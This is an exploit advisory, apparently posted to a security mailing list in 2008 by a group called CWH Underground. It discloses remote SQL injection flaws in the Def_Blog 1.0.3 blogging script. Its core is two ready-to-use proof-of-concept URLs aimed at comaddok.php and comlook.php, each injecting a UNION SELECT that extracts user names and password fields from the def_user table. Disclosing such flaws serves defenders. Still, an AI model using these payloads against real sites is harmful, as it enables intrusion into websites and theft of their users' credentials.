Def_Blog 1.0.3 Multiple Remote SQL Injection Vulnerabilities

tan_prathan Fri, 18 Jul 2008 08:37:19 -0700

================================================================

  Def_Blog 1.0.3 Multiple Remote SQL Injection Vulnerabilities


================================================================


  ,--^----------,--------,-----,-------^--,

  | |||||||||   `--------'     |          O     .. CWH Underground Hacking Team 
..

  `+---------------------------^----------|

    `\_,-------, _________________________|

      / XXXXXX /`|     /

     / XXXXXX /  `\   /

    / XXXXXX /\______(

   / XXXXXX /           

  / XXXXXX /

 (________(             

  `------'



AUTHOR : CWH Underground

DATE   : 16 July 2008

SITE   : cwh.citec.us



#####################################################

 APPLICATION : Def_Blog

 VERSION     : 1.0.3

 DOWNLOAD    : http://www.easy-script.com/Def_Blog_V.1.0.3.zip

#####################################################


-- Remote SQL Injection ---


-----------------

 Vulnerable File

-----------------


[+] comaddok.php

[+] comlook.php



-------------

 POC Exploit

-------------


[+] 
http://[Target]/[def_blog_path]/comaddok.php?article=-1+union+select+1,concat(pseudo,0x3a3a,mdp)+from+def_user--

[+] 
http://[Target]/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user--



#####################################################################

 Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   

 Special Thx : asylu3, citec.us

#####################################################################

Def_Blog 1.0.3 Multiple Remote SQL Injection Vulnerabilities

Reply via email to